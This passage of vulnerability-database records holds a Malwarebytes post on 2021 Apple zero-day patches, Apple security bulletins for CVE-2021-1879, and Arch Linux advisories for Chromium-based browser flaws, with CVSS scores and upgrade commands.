[CVE-2021-30762](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30762>) \u2013 WebKit: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.\n * [CVE-2021-308](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30807>)[0](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30807>)[7](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30807>) \u2013 IOMobileFrameBuffer: An application may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited. Tied to Pegasus (see above).\n * [CVE-2021-30858](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30858>) \u2013 WebKit: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.\n * [CVE-2021-30860](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30860>) \u2013 CoreGraphics: Processing a maliciously crafted PDF may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited. This is FORCEDENTRY (see above).\n * [CVE-2021-30869](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30869>) \u2013 XNU: A malicious application may be able to execute arbitrary code with kernel privileges. [Reportedly](<https://www.helpnetsecurity.com/2021/09/24/cve-2021-30869/>) being actively exploited by attackers in conjunction with a previously known WebKit vulnerability.\n\nAnd last but not least, the latest addition\u2014CVE-2021-30883\u2014which means that of the 17 zero-days that were fixed over the course of a handful of months, at least 16 were found to be actively exploited.\n\n### Update\n\nApple advises users to update to [iOS 15.0.2 and iPadOS 15.0.2](<https://support.apple.com/en-gb/HT212846>) which can be done through the automatic update function or iTunes.\n\nStay safe, everyone!\n\nThe post [Update now! Apple patches another privilege escalation bug in iOS and iPadOS](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/10/update-now-apple-patches-another-privilege-escalation-bug-in-ios-and-ipados/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-12T16:07:53", "type": "malwarebytes", "title": "Update now! Apple patches another privilege escalation bug in iOS and iPadOS", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1782", "CVE-2021-1870", "CVE-2021-1871", "CVE-2021-1879", "CVE-2021-30657", "CVE-2021-30661", "CVE-2021-30663", "CVE-2021-30665", "CVE-2021-30666", "CVE-2021-30713", "CVE-2021-30761", "CVE-2021-30762", "CVE-2021-30807", "CVE-2021-30858", "CVE-2021-30860", "CVE-2021-30869", "CVE-2021-30883"], "modified": "2021-10-12T16:07:53", "id": "MALWAREBYTES:11D4071979D3FC1E6028AA8D71EB87F4", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/10/update-now-apple-patches-another-privilege-escalation-bug-in-ios-and-ipados/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "apple": [{"lastseen": "2023-12-02T22:11:20", "description": "# About the security content of iOS 14.4.2 and iPadOS 14.4.2\n\nThis document describes the security content of iOS 14.4.2 and iPadOS 14.4.2.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n## iOS 14.4.2 and iPadOS 14.4.2\n\nReleased March 26, 2021\n\n**WebKit**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: Processing maliciously crafted web content may lead to universal cross site scripting. Apple is aware of a report that this issue may have been actively exploited.\n\nDescription: This issue was addressed by improved management of object lifetimes.\n\nCVE-2021-1879: Clement Lecigne of Google Threat Analysis Group and Billy Leonard of Google Threat Analysis Group\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: November 03, 2023\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-03-26T00:00:00", "type": "apple", "title": "About the security content of iOS 14.4.2 and iPadOS 14.4.2", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1879"], "modified": "2021-03-26T00:00:00", "id": "APPLE:6F6ABDDC9804AE7A4086CB77C2D1EF4A", "href": "https://support.apple.com/kb/HT212256", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-12-02T22:11:21", "description": "# About the security content of watchOS 7.3.3\n\nThis document describes the security content of watchOS 7.3.3.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n## watchOS 7.3.3\n\nReleased March 26, 2021\n\n**WebKit**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: Processing maliciously crafted web content may lead to universal cross site scripting. Apple is aware of a report that this issue may have been actively exploited.\n\nDescription: This issue was addressed by improved management of object lifetimes.\n\nCVE-2021-1879: Clement Lecigne of Google Threat Analysis Group and Billy Leonard of Google Threat Analysis Group\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: November 03, 2023\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-03-26T00:00:00", "type": "apple", "title": "About the security content of watchOS 7.3.3", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1879"], "modified": "2021-03-26T00:00:00", "id": "APPLE:7BA0021A4788FB7533B47DE574B071E4", "href": "https://support.apple.com/kb/HT212258", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-12-02T22:11:17", "description": "# About the security content of iOS 12.5.2\n\nThis document describes the security content of iOS 12.5.2.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n\n\n## iOS 12.5.2\n\nReleased March 26, 2021\n\n**WebKit**\n\nAvailable for: iPhone 5s, iPhone 6, iPhone 6 Plus, iPad Air, iPad mini 2, iPad mini 3, and iPod touch (6th generation)\n\nImpact: Processing maliciously crafted web content may lead to universal cross site scripting. Apple is aware of a report that this issue may have been actively exploited.\n\nDescription: This issue was addressed by improved management of object lifetimes.\n\nCVE-2021-1879: Clement Lecigne of Google Threat Analysis Group and Billy Leonard of Google Threat Analysis Group\n\n\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: March 26, 2021\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-03-26T00:00:00", "type": "apple", "title": "About the security content of iOS 12.5.2", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1879"], "modified": "2021-03-26T00:00:00", "id": "APPLE:0F898F86D77B1E8D84FF7B933794464E", "href": "https://support.apple.com/kb/HT212257", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "archlinux": [{"lastseen": "2023-12-02T15:37:44", "description": "Arch Linux Security Advisory ASA-202107-2\n=========================================\n\nSeverity: Critical\nDate : 2021-07-01\nCVE-ID : CVE-2021-30544 CVE-2021-30548 CVE-2021-30551\nPackage : electron11\nType : multiple issues\nRemote : Yes\nLink : https://security.archlinux.org/AVG-2099\n\nSummary\n=======\n\nThe package electron11 before version 11.4.9-1 is vulnerable to\nmultiple issues including arbitrary code execution and incorrect\ncalculation.\n\nResolution\n==========\n\nUpgrade to 11.4.9-1.\n\n# pacman -Syu \"electron11>=11.4.9-1\"\n\nThe problems have been fixed upstream in version 11.4.9.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\n- CVE-2021-30544 (arbitrary code execution)\n\nA use after free security issue has been found in the BFCache component\nof the Chromium browser before version 91.0.4472.101.\n\n- CVE-2021-30548 (arbitrary code execution)\n\nA use after free security issue has been found in the Loader component\nof the Chromium browser before version 91.0.4472.101.\n\n- CVE-2021-30551 (incorrect calculation)\n\nA type confusion security issue has been found in the V8 component of\nthe Chromium browser before version 91.0.4472.101. Google is aware that\nan exploit for CVE-2021-30551 exists in the wild.\n\nImpact\n======\n\nA remote attacker could execute arbitrary code through a crafted web\npage. Google is aware that an exploit for one of the security issues\nexists in the wild.\n\nReferences\n==========\n\nhttps://www.electronjs.org/releases/stable?version=11#11.4.9\nhttps://chromereleases.googleblog.com/2021/06/stable-channel-update-for-desktop.html\nhttps://crbug.com/1212618\nhttps://crbug.com/1210487\nhttps://crbug.com/1216437\nhttps://security.archlinux.org/CVE-2021-30544\nhttps://security.archlinux.org/CVE-2021-30548\nhttps://security.archlinux.org/CVE-2021-30551", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-07-01T00:00:00", "type": "archlinux", "title": "[ASA-202107-2] electron11: multiple issues", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30544", "CVE-2021-30548", "CVE-2021-30551"], "modified": "2021-07-01T00:00:00", "id": "ASA-202107-2", "href": "https://security.archlinux.org/ASA-202107-2", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-02T15:37:49", "description": "Arch Linux Security Advisory ASA-202106-31\n==========================================\n\nSeverity: Critical\nDate : 2021-06-15\nCVE-ID : CVE-2021-30544 CVE-2021-30545 CVE-2021-30546 CVE-2021-30547\nCVE-2021-30548 CVE-2021-30549 CVE-2021-30550 CVE-2021-30551\nCVE-2021-30552 CVE-2021-30553\nPackage : chromium\nType : multiple issues\nRemote : Yes\nLink : https://security.archlinux.org/AVG-2057\n\nSummary\n=======\n\nThe package chromium before version 91.0.4472.101-1 is vulnerable to\nmultiple issues including arbitrary code execution and incorrect\ncalculation.\n\nResolution\n==========\n\nUpgrade to 91.0.4472.101-1.\n\n# pacman -Syu \"chromium>=91.0.4472.101-1\"\n\nThe problems have been fixed upstream in version 91.0.4472.101.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\n- CVE-2021-30544 (arbitrary code execution)\n\nA use after free security issue has been found in the BFCache component\nof the Chromium browser before version 91.0.4472.101.\n\n- CVE-2021-30545 (arbitrary code execution)\n\nA use after free security issue has been found in the Extensions\ncomponent of the Chromium browser before version 91.0.4472.101.\n\n- CVE-2021-30546 (arbitrary code execution)\n\nA use after free security issue has been found in the Autofill\ncomponent of the Chromium browser before version 91.0.4472.101.\n\n- CVE-2021-30547 (arbitrary code execution)\n\nAn out of bounds write security issue has been found in the ANGLE\ncomponent of the Chromium browser before version 91.0.4472.101.\n\n- CVE-2021-30548 (arbitrary code execution)\n\nA use after free security issue has been found in the Loader component\nof the Chromium browser before version 91.0.4472.101.\n\n- CVE-2021-30549 (arbitrary code execution)\n\nA use after free security issue has been found in the Spell check\ncomponent of the Chromium browser before version 91.0.4472.101.\n\n- CVE-2021-30550 (arbitrary code execution)\n\nA use after free security issue has been found in the Accessibility\ncomponent of the Chromium browser before version 91.0.4472.101.\n\n- CVE-2021-30551 (incorrect calculation)\n\nA type confusion security issue has been found in the V8 component of\nthe Chromium browser before version 91.0.4472.101. Google is aware that\nan exploit for CVE-2021-30551 exists in the wild.\n\n- CVE-2021-30552 (arbitrary code execution)\n\nA use after free security issue has been found in the Extensions\ncomponent of the Chromium browser before version 91.0.4472.101.\n\n- CVE-2021-30553 (arbitrary code execution)\n\nA use after free security issue has been found in the Network service\ncomponent of the Chromium browser before version 91.0.4472.101.\n\nImpact\n======\n\nA remote attacker could execute arbitrary code through a crafted web\npage or extension. Google is aware that an exploit for one of the\nsecurity issues exists in the wild.\n\nReferences\n==========\n\nhttps://chromereleases.googleblog.com/2021/06/stable-channel-update-for-desktop.html\nhttps://crbug.com/1212618\nhttps://crbug.com/1201031\nhttps://crbug.com/1206911\nhttps://crbug.com/1210414\nhttps://crbug.com/1210487\nhttps://crbug.com/1212498\nhttps://crbug.com/1212500\nhttps://crbug.com/1216437\nhttps://crbug.com/1200679\nhttps://crbug.com/1209769\nhttps://security.archlinux.org/CVE-2021-30544\nhttps://security.archlinux.org/CVE-2021-30545\nhttps://security.archlinux.org/CVE-2021-30546\nhttps://security.archlinux.org/CVE-2021-30547\nhttps://security.archlinux.org/CVE-2021-30548\nhttps://security.archlinux.org/CVE-2021-30549\nhttps://security.archlinux.org/CVE-2021-30550\nhttps://security.archlinux.org/CVE-2021-30551\nhttps://security.archlinux.org/CVE-2021-30552\nhttps://security.archlinux.org/CVE-2021-30553", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-15T00:00:00", "type": "archlinux", "title": "[ASA-202106-31] chromium: multiple issues", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30544", "CVE-2021-30545", "CVE-2021-30546", "CVE-2021-30547", "CVE-2021-30548", "CVE-2021-30549", "CVE-2021-30550", "CVE-2021-30551", "CVE-2021-30552", "CVE-2021-30553"], "modified": "2021-06-15T00:00:00", "id": "ASA-202106-31", "href": "https://security.archlinux.org/ASA-202106-31", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-02T15:37:50", "description": "Arch Linux Security Advisory ASA-202106-32\n==========================================\n\nSeverity: Critical\nDate : 2021-06-15\nCVE-ID : CVE-2021-30544 CVE-2021-30545 CVE-2021-30546 CVE-2021-30547\nCVE-2021-30548 CVE-2021-30549 CVE-2021-30550 CVE-2021-30551\nCVE-2021-30552 CVE-2021-30553\nPackage : vivaldi\nType : multiple issues\nRemote : Yes\nLink : https://security.archlinux.org/AVG-2058\n\nSummary\n=======\n\nThe package vivaldi before version 4.0.2312.25-1 is vulnerable to\nmultiple issues including arbitrary code execution and incorrect\ncalculation.\n\nResolution\n==========\n\nUpgrade to 4.0.2312.25-1.\n\n# pacman -Syu \"vivaldi>=4.0.2312.25-1\"\n\nThe problems have been fixed upstream in version 4.0.2312.25.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\n- CVE-2021-30544 (arbitrary code execution)\n\nA use after free security issue has been found in the BFCache component\nof the Chromium browser before version 91.0.4472.101.\n\n- CVE-2021-30545 (arbitrary code execution)\n\nA use after free security issue has been found in the Extensions\ncomponent of the Chromium browser before version 91.0.4472.101.\n\n- CVE-2021-30546 (arbitrary code execution)\n\nA use after free security issue has been found in the Autofill\ncomponent of the Chromium browser before version 91.0.4472.101.\n\n- CVE-2021-30547 (arbitrary code execution)\n\nAn out of bounds write security issue has been found in the ANGLE\ncomponent of the Chromium browser before version 91.0.4472.101.\n\n- CVE-2021-30548 (arbitrary code execution)\n\nA use after free security issue has been found in the Loader component\nof the Chromium browser before version 91.0.4472.101.\n\n- CVE-2021-30549 (arbitrary code execution)\n\nA use after free security issue has been found in the Spell check\ncomponent of the Chromium browser before version 91.0.4472.101.\n\n- CVE-2021-30550 (arbitrary code execution)\n\nA use after free security issue has been found in the Accessibility\ncomponent of the Chromium browser before version 91.0.4472.101.\n\n- CVE-2021-30551 (incorrect calculation)\n\nA type confusion security issue has been found in the V8 component of\nthe Chromium browser before version 91.0.4472.101. Google is aware that\nan exploit for CVE-2021-30551 exists in the wild.\n\n- CVE-2021-30552 (arbitrary code execution)\n\nA use after free security issue has been found in the Extensions\ncomponent of the Chromium browser before version 91.0.4472.101.\n\n- CVE-2021-30553 (arbitrary code execution)\n\nA use after free security issue has been found in the Network service\ncomponent of the Chromium browser before version 91.0.4472.101.\n\nImpact\n======\n\nA remote attacker could execute arbitrary code through a crafted web\npage or extension. Google is aware that an exploit for one of the\nsecurity issues exists in the wild.\n\nReferences\n==========\n\nhttps://vivaldi.com/blog/desktop/minor-update-for-vivaldi-desktop-browser-4-0/\nhttps://chromereleases.googleblog.com/2021/06/stable-channel-update-for-desktop.html\nhttps://crbug.com/1212618\nhttps://crbug.com/1201031\nhttps://crbug.com/1206911\nhttps://crbug.com/1210414\nhttps://crbug.com/1210487\nhttps://crbug.com/1212498\nhttps://crbug.com/1212500\nhttps://crbug.com/1216437\nhttps://crbug.com/1200679\nhttps://crbug.com/1209769\nhttps://security.archlinux.org/CVE-2021-30544\nhttps://security.archlinux.org/CVE-2021-30545\nhttps://security.archlinux.org/CVE-2021-30546\nhttps://security.archlinux.org/CVE-2021-30547\nhttps://security.archlinux.org/CVE-2021-30548\nhttps://security.archlinux.org/CVE-2021-30549\nhttps://security.archlinux.org/CVE-2021-30550\nhttps://security.archlinux.org/CVE-2021-30551\nhttps://security.archlinux.org/CVE-2021-30552\nhttps://security.archlinux.org/CVE-2021-30553", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-15T00:00:00", "type": "archlinux", "title": "[ASA-202106-32] vivaldi: multiple issues", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30544", "CVE-2021-30545", "CVE-2021-30546", "CVE-2021-30547", "CVE-2021-30548", "CVE-2021-30549", "CVE-2021-30550", "CVE-2021-30551", "CVE-2021-30552", "CVE-2021-30553"], "modified": "2021-06-15T00:00:00", "id": "ASA-202106-32", "href": "https://security.archlinux.org/ASA-202106-32", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-02T15:37:47", "description": "Arch Linux Security Advisory ASA-202106-45\n==========================================\n\nSeverity: Critical\nDate : 2021-06-22\nCVE-ID : CVE-2021-30544 CVE-2021-30545 CVE-2021-30546 CVE-2021-30547\nCVE-2021-30548 CVE-2021-30549 CVE-2021-30550 CVE-2021-30551\nCVE-2021-30552 CVE-2021-30553\nPackage : opera\nType : multiple issues\nRemote : Yes\nLink : https://security.archlinux.org/AVG-2059\n\nSummary\n=======\n\nThe package opera before version 77.0.4054.90-1 is vulnerable to\nmultiple issues including arbitrary code execution and incorrect\ncalculation.\n\nResolution\n==========\n\nUpgrade to 77.0.4054.90-1.\n\n# pacman -Syu \"opera>=77.0.4054.90-1\"\n\nThe problems have been fixed upstream in version 77.0.4054.90.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\n- CVE-2021-30544 (arbitrary code execution)\n\nA use after free security issue has been found in the BFCache component\nof the Chromium browser before version 91.0.4472.101.\n\n- CVE-2021-30545 (arbitrary code execution)\n\nA use after free security issue has been found in the Extensions\ncomponent of the Chromium browser before version 91.0.4472.101.\n\n- CVE-2021-30546 (arbitrary code execution)\n\nA use after free security issue has been found in the Autofill\ncomponent of the Chromium browser before version 91.0.4472.101.\n\n- CVE-2021-30547 (arbitrary code execution)\n\nAn out of bounds write security issue has been found in the ANGLE\ncomponent of the Chromium browser before version 91.0.4472.101.\n\n- CVE-2021-30548 (arbitrary code execution)\n\nA use after free security issue has been found in the Loader component\nof the Chromium browser before version 91.0.4472.101.\n\n- CVE-2021-30549 (arbitrary code execution)\n\nA use after free security issue has been found in the Spell check\ncomponent of the Chromium browser before version 91.0.4472.101.\n\n- CVE-2021-30550 (arbitrary code execution)\n\nA use after free security issue has been found in the Accessibility\ncomponent of the Chromium browser before version 91.0.4472.101.\n\n- CVE-2021-30551 (incorrect calculation)\n\nA type confusion security issue has been found in the V8 component of\nthe Chromium browser before version 91.0.4472.101. Google is aware that\nan exploit for CVE-2021-30551 exists in the wild.\n\n- CVE-2021-30552 (arbitrary code execution)\n\nA use after free security issue has been found in the Extensions\ncomponent of the Chromium browser before version 91.0.4472.101.\n\n- CVE-2021-30553 (arbitrary code execution)\n\nA use after free security issue has been found in the Network service\ncomponent of the Chromium browser before version 91.0.4472.101.\n\nImpact\n======\n\nA remote attacker could execute arbitrary code through a crafted web\npage or extension. Google is aware that an exploit for one of the\nsecurity issues exists in the wild.\n\nReferences\n==========\n\nhttps://blogs.opera.com/desktop/changelog-for-77/\nhttps://chromereleases.googleblog.com/2021/06/stable-channel-update-for-desktop.html\nhttps://crbug.com/1212618\nhttps://crbug.com/1201031\nhttps://crbug.com/1206911\nhttps://crbug.com/1210414\nhttps://crbug.com/1210487\nhttps://crbug.com/1212498\nhttps://crbug.com/1212500\nhttps://crbug.com/1216437\nhttps://crbug.com/1200679\nhttps://crbug.com/1209769\nhttps://security.archlinux.org/CVE-2021-30544\nhttps://security.archlinux.org/CVE-2021-30545\nhttps://security.archlinux.org/CVE-2021-30546\nhttps://security.archlinux.org/CVE-2021-30547\nhttps://security.archlinux.org/CVE-2021-30548\nhttps://security.archlinux.org/CVE-2021-30549\nhttps://security.archlinux.org/CVE-2021-30550\nhttps://security.archlinux.org/CVE-2021-30551\nhttps://security.archlinux.org/CVE-2021-30552\nhttps://security.archlinux.org/CVE-2021-30553", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-22T00:00:00", "type": "archlinux", "title": "[ASA-202106-45] opera: multiple issues", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30544", "CVE-2021-30545", "CVE-2021-30546", "CVE-2021-30547", "CVE-2021-30548", "CVE-2021-30549", "CVE-2021-30550", "CVE-2021-30551", 